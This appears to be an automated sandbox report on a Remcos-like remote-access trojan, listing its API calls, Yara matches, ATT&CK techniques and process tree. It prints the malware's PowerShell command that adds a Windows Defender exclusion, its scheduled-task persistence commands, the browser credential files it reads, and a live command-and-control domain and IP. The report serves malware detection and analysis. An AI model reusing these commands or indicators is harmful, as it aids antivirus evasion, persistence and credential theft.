              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0040E18D Sleep,ExitProcess, 15_2_0040E18D
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Memory allocated: 30F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Memory allocated: 32E0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Memory allocated: 52E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Memory allocated: 1440000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Memory allocated: 3100000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Memory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 15_2_004186FE
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7677
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1687
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Window / User API: threadDelayed 2631
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Window / User API: threadDelayed 7362
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe API coverage: 5.0 %
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7600 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024 Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952 Thread sleep count: 2631 > 30
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952 Thread sleep time: -7893000s >= -30000s
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952 Thread sleep count: 7362 > 30
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe TID: 7952 Thread sleep time: -22086000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe TID: 8068 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_0041A01B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_0040B28E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_0040838E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_004087A0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_00407848
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004068CD FindFirstFileW,FindNextFileW, 15_2_004068CD
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0044BA59 FindFirstFileExA, 15_2_0044BA59
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040AA71
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00417AAB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040AC78
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 15_2_00406D28
              Source: vQyKfYxzXB.exe, 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_004327AE
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041A8DA
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004407B5 mov eax, dword ptr fs:[00000030h] 15_2_004407B5
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 15_2_00410763
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004328FC SetUnhandledExceptionFilter, 15_2_004328FC
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_004398AC
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00432D5C
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Memory written: C:\Users\user\Desktop\vQyKfYxzXB.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Memory written: C:\Users\user\AppData\Roaming\RTdozXra.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00410B5C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004175E1 mouse_event, 15_2_004175E1
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Process created: C:\Users\user\AppData\Roaming\RTdozXra.exe "C:\Users\user\AppData\Roaming\RTdozXra.exe"
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: 15_2_004329DA cpuid 15_2_004329DA
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: EnumSystemLocalesW, 15_2_0044F17B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: EnumSystemLocalesW, 15_2_0044F130
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: EnumSystemLocalesW, 15_2_0044F216
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_0044F2A3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoA, 15_2_0040E2BB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoW, 15_2_0044F4F3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_0044F61C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoW, 15_2_0044F723
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_0044F7F0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: EnumSystemLocalesW, 15_2_00445914
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: GetLocaleInfoW, 15_2_00445E1C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 15_2_0044EEB8
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Users\user\Desktop\vQyKfYxzXB.exe VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Users\user\AppData\Roaming\RTdozXra.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040A0B0 GetLocalTime,wsprintfW,15_2_0040A0B0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004195F8 GetUserNameW,15_2_004195F8
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_004466BF
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe; Code function 15_2_0040A953: \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe; Code function 15_2_0040AA71: \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe; Code function 15_2_0040AA71: \key3.db

Remote Access Functionality

The Yara hits below are the same rule matches listed under Stealing of Sensitive Information (the Remcos rule contributes to both categories); only the last entry is specific to this section.

Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\RTdozXra.exe; Code function 15_2_0040567A: cmd.exe
MITRE ATT&CK Matrix

The matrix was flattened in the source; it is rebuilt here one tactic (column) at a time, cells listed top to bottom as in the original grid. A leading number is the badge the report shows on a matched technique, copied as rendered; entries without one are the grid's unmatched template cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 1 Windows Service; 121 Process Injection; 1 Scheduled Task/Job; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 121 Process Injection
Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 33 System Information Discovery; 121 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 11 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1587729; sample: vQyKfYxzXB.exe; start date: 10/01/2025; architecture: WINDOWS; score: 100). Rebuilt from the flattened graph text; the number in brackets after a process is the counter the graph shows next to it.

Top-level nodes:
- DNS/IP: decmainserver.webredirect.org
- Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

Process tree:
- vQyKfYxzXB.exe [7] (submitted sample)
  - Dropped files: C:\Users\user\AppData\Roaming\RTdozXra.exe (PE32); C:\Users\...\RTdozXra.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp8902.tmp (XML); C:\Users\user\AppData\...\vQyKfYxzXB.exe.log (ASCII)
  - Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  - powershell.exe [23]: signature "Loading BitLocker PowerShell Module"; starts WmiPrvSE.exe and conhost.exe
  - vQyKfYxzXB.exe [2] (second instance): connects to decmainserver.webredirect.org (69.174.98.48, ports 45682, 49702, 49820; ASN-QUADRANET-GLOBALUS, United States)
  - schtasks.exe [1]: starts conhost.exe
  - 2 other processes
- RTdozXra.exe [5] (the dropped copy, shown as a separate root process; the timeline further down records the scheduled task "RTdozXra" that points at it)
  - Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; 5 other signatures
  - schtasks.exe [1]: starts conhost.exe
  - RTdozXra.exe (second instance)
